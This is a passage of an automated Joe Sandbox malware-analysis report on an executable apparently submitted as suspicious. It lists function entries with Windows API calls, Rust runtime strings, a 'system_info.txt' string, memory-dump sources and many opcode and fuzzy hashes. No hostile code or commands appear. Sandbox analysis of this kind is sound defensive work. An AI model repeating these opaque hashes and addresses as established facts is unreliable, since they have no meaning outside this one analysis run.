                                        • Instruction Fuzzy Hash: 9FD19222E08B4186FB50AF2AE4C03B967B4EB95798F940532DA6D477D4DF3DE055C3A0
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2423701109.00007FF7F4101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4100000, based on PE: true
                                        • Associated: 00000000.00000002.2423680582.00007FF7F4100000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2423734929.00007FF7F4140000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2423774744.00007FF7F415A000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2423798690.00007FF7F415B000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff7f4100000_9KEZfGRjyK.jbxd
                                        Similarity
                                        • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                        • String ID: csm
                                        • API String ID: 2395640692-1018135373
                                        • Opcode ID: 1073ff76e281692413ab2b7aa27f58aec6c4a35b0489a6cc94ddb9ff7625e67e
                                        • Instruction ID: a574582355123ecbb7bf4bc9a75fe9e05e22e6e30a9bd9664306c8223fb3bc3b
                                        • Opcode Fuzzy Hash: 1073ff76e281692413ab2b7aa27f58aec6c4a35b0489a6cc94ddb9ff7625e67e
                                        • Instruction Fuzzy Hash: 7951B132F296028BDB14EF16F084679B795EB40B88F814134EA6A477C8EF3CE841D790
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2423701109.00007FF7F4101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4100000, based on PE: true
                                        • Associated: 00000000.00000002.2423680582.00007FF7F4100000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2423734929.00007FF7F4140000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2423774744.00007FF7F415A000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2423798690.00007FF7F415B000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff7f4100000_9KEZfGRjyK.jbxd
                                        Similarity
                                        • API ID: terminate
                                        • String ID: MOC$RCC$csm
                                        • API String ID: 1821763600-2671469338
                                        • Opcode ID: 7452083ed9cb36d213407fe42873fc44bc2a82579146da1c61ef2b8bef4380e9
                                        • Instruction ID: af840b05aaa46cc2c46bb17373057f555267cf17cf827866dbfd6e6e862ccb1e
                                        • Opcode Fuzzy Hash: 7452083ed9cb36d213407fe42873fc44bc2a82579146da1c61ef2b8bef4380e9
                                        • Instruction Fuzzy Hash: 79F06936D08646C7EB247F17F1C1078B260EB58780F889231D7AC0A6D2CF7CE890E6A1
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2423701109.00007FF7F4101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4100000, based on PE: true
                                        • Associated: 00000000.00000002.2423680582.00007FF7F4100000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2423734929.00007FF7F4140000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2423774744.00007FF7F415A000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2423798690.00007FF7F415B000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff7f4100000_9KEZfGRjyK.jbxd
                                        Similarity
                                        • API ID: AddressHandleModuleProc
                                        • String ID: SetThreadDescription$kernel32
                                        • API String ID: 1646373207-1950310818
                                        • Opcode ID: 413311be91697036f5db5f8af35ed6315efe56a155240f357945624ab3dea04c
                                        • Instruction ID: aa43875352245bcbf809fbd6a9ac5c3a73c06500cfc4423590572e04f0724bf3
                                        • Opcode Fuzzy Hash: 413311be91697036f5db5f8af35ed6315efe56a155240f357945624ab3dea04c
                                        • Instruction Fuzzy Hash: 69F01D50F59A42D6FB15AF47F9C40A0A6A06F09BE0FC44036CD2D527E4AF2CA649C2A0
                                        APIs
                                        • CancelIo.KERNEL32(?,?,?,?,?,?,?,00000000,00000000,?,00007FF7F410F97D,?,?,00000000,00000000,?), ref: 00007FF7F4121488
                                        • GetOverlappedResult.KERNEL32(?,?,?,?,?,?,?,00000000,00000000,?,00007FF7F410F97D,?,?,00000000,00000000,?), ref: 00007FF7F41214AA
                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,00000000,00000000,?,00007FF7F410F97D,?,?,00000000,00000000,?), ref: 00007FF7F41214BC
                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,00000000,00000000,?,00007FF7F410F97D,?,?,00000000,00000000,?), ref: 00007FF7F4121528
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2423701109.00007FF7F4101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4100000, based on PE: true
                                        • Associated: 00000000.00000002.2423680582.00007FF7F4100000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2423734929.00007FF7F4140000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2423774744.00007FF7F415A000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2423798690.00007FF7F415B000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff7f4100000_9KEZfGRjyK.jbxd
                                        Similarity
                                        • API ID: ErrorLast$CancelOverlappedResult
                                        • String ID:
                                        • API String ID: 3836860830-0
                                        • Opcode ID: a884bd1a06d4c2eb8e9cbb3695207d8384306ba8dfc3dcae3472e3a9cd46b628
                                        • Instruction ID: 76ef9b8c474ed2900398b8b52660e550cbe294f3a9993c5df71ebaa366071834
                                        • Opcode Fuzzy Hash: a884bd1a06d4c2eb8e9cbb3695207d8384306ba8dfc3dcae3472e3a9cd46b628
                                        • Instruction Fuzzy Hash: CC417032E18A4186F710DF66E8803AD67A0BB95794F544631DE6E437D4DF78D581C3A0
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2423701109.00007FF7F4101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4100000, based on PE: true
                                        • Associated: 00000000.00000002.2423680582.00007FF7F4100000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2423734929.00007FF7F4140000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2423774744.00007FF7F415A000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2423798690.00007FF7F415B000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff7f4100000_9KEZfGRjyK.jbxd
                                        Similarity
                                        • API ID: ErrorLast$DirectorySystem
                                        • String ID:
                                        • API String ID: 860285823-0
                                        • Opcode ID: eb39d9dc3ab494b94e2d1b0ffc44216c63ff8d20ddcc7591486e24af19e69c66
                                        • Instruction ID: aa328f2bfa2ffbf893b9a1fe08cfb7e4038a692ca8de87679ca275103e108140
                                        • Opcode Fuzzy Hash: eb39d9dc3ab494b94e2d1b0ffc44216c63ff8d20ddcc7591486e24af19e69c66
                                        • Instruction Fuzzy Hash: A441C925E04ED186E774AF37EC843BE6291BB04755F904135D96DCBBC8DF2C96408350
                                        APIs
                                        • CreateEventW.KERNEL32(?,?,?,00000000,?,?,?,00007FF7F4120D5D), ref: 00007FF7F4121100
                                        • GetLastError.KERNEL32(?,?,?,00000000,?,?,?,00007FF7F4120D5D), ref: 00007FF7F412115D
                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,00000000,?,?,?,00007FF7F4120D5D), ref: 00007FF7F41211CE
                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,00000000,?,?,?,00007FF7F4120D5D), ref: 00007FF7F41211D4
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2423701109.00007FF7F4101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4100000, based on PE: true
                                        • Associated: 00000000.00000002.2423680582.00007FF7F4100000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2423734929.00007FF7F4140000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2423774744.00007FF7F415A000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2423798690.00007FF7F415B000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff7f4100000_9KEZfGRjyK.jbxd
                                        Similarity
                                        • API ID: CloseHandle$CreateErrorEventLast
                                        • String ID:
                                        • API String ID: 3743700123-0
                                        • Opcode ID: 19626a39ad0d5ba7b181dd2f40a95146c2c1a4e072f003b6bbab82c629dff18b
                                        • Instruction ID: 5ac0756513a522e9b28f3f14373220072631dcdb582127a5e8717d1d48854804
                                        • Opcode Fuzzy Hash: 19626a39ad0d5ba7b181dd2f40a95146c2c1a4e072f003b6bbab82c629dff18b
                                        • Instruction Fuzzy Hash: 9D217133B04B4186F7259F27F8407A9AA64FB897A4F584235DFAD127D0EF3895D28350
                                        Strings
                                        • use of std::thread::current() is not possible after the thread's local data has been destroyedlibrary\std\src\thread\mod.rs, xrefs: 00007FF7F413E8BC
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2423701109.00007FF7F4101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4100000, based on PE: true
                                        • Associated: 00000000.00000002.2423680582.00007FF7F4100000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2423734929.00007FF7F4140000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2423774744.00007FF7F415A000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2423798690.00007FF7F415B000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff7f4100000_9KEZfGRjyK.jbxd
                                        Similarity
                                        • API ID: AddressWake$Single
                                        • String ID: use of std::thread::current() is not possible after the thread's local data has been destroyedlibrary\std\src\thread\mod.rs
                                        • API String ID: 1135737206-63010627
                                        • Opcode ID: 8a86cd98932279247778391f93ff708e004df7436a706d6f3d3cea724bd37281
                                        • Instruction ID: 5fb73ddf7664aa2c8ef219dd8e1b4bd530d9e4c49acae66898dfb4dcbedf18fd
                                        • Opcode Fuzzy Hash: 8a86cd98932279247778391f93ff708e004df7436a706d6f3d3cea724bd37281
                                        • Instruction Fuzzy Hash: 45915E25E4C74686FB51EF1AF8C13BAA7A0AF54794F844231D92D432E1DF2EA485D3A0
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2423701109.00007FF7F4101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4100000, based on PE: true
                                        • Associated: 00000000.00000002.2423680582.00007FF7F4100000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2423734929.00007FF7F4140000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2423774744.00007FF7F415A000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2423798690.00007FF7F415B000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff7f4100000_9KEZfGRjyK.jbxd
                                        Similarity
                                        • API ID: AddressWake
                                        • String ID: system_info.txtFailed to write to file:
                                        • API String ID: 98804233-2426490079
                                        • Opcode ID: cafdba6228075f100baa5bb20edf4749aba7be72585362519b9a1f3a86e265ea
                                        • Instruction ID: fa8d31e304c4d367d766b49b188b84bc5b15c31fa821522986d66625a7c77e4e
                                        • Opcode Fuzzy Hash: cafdba6228075f100baa5bb20edf4749aba7be72585362519b9a1f3a86e265ea
                                        • Instruction Fuzzy Hash: B2317032D0870187F722AF16F89437AB690EB45354F804535CB9E466E0DF7DE486D3A0
                                        Strings
                                        • use of std::thread::current() is not possible after the thread's local data has been destroyedlibrary\std\src\thread\mod.rs, xrefs: 00007FF7F4116574
                                        • lock count overflow in reentrant mutexlibrary\std\src\sync\reentrant_lock.rs, xrefs: 00007FF7F411658C
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2423701109.00007FF7F4101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4100000, based on PE: true
                                        • Associated: 00000000.00000002.2423680582.00007FF7F4100000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2423734929.00007FF7F4140000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2423774744.00007FF7F415A000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2423798690.00007FF7F415B000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff7f4100000_9KEZfGRjyK.jbxd
                                        Similarity
                                        • API ID: AddressSingleWake
                                        • String ID: lock count overflow in reentrant mutexlibrary\std\src\sync\reentrant_lock.rs$use of std::thread::current() is not possible after the thread's local data has been destroyedlibrary\std\src\thread\mod.rs
                                        • API String ID: 3114109732-122189663
                                        • Opcode ID: 64d5a3d3fa18f3a3fc433c4ccd56d879ed2de9446630ab22567387b405544f65
                                        • Instruction ID: bb474584f5870a14201bcb446905aad4a7d6965d59c7361a5c535bce44e9a21b
                                        • Opcode Fuzzy Hash: 64d5a3d3fa18f3a3fc433c4ccd56d879ed2de9446630ab22567387b405544f65
                                        • Instruction Fuzzy Hash: 3231C732F09A119AFB50EF66E8813FC6774AB84758F948635CE2C127D4EF399586C390
                                        APIs
                                        • RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF7F412B590), ref: 00007FF7F4139D00
                                        • RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF7F412B590), ref: 00007FF7F4139D41
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2423701109.00007FF7F4101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4100000, based on PE: true
                                        • Associated: 00000000.00000002.2423680582.00007FF7F4100000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2423734929.00007FF7F4140000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2423774744.00007FF7F415A000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2423798690.00007FF7F415B000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff7f4100000_9KEZfGRjyK.jbxd
                                        Similarity
                                        • API ID: ExceptionFileHeaderRaise
                                        • String ID: csm
                                        • API String ID: 2573137834-1018135373
                                        • Opcode ID: e5c20127fb61fcfa79ca1083f679c47f420afe444f066555bc0ec0915a8c86cb
                                        • Instruction ID: 1670c03089c43cb2dff58e3a952d406e3972570238ece305a640d72f702684f2
                                        • Opcode Fuzzy Hash: e5c20127fb61fcfa79ca1083f679c47f420afe444f066555bc0ec0915a8c86cb
                                        • Instruction Fuzzy Hash: 00113072A18B4182EB619F16F480269B7E5FB88B94F984234DE9D077A8EF3CD551C740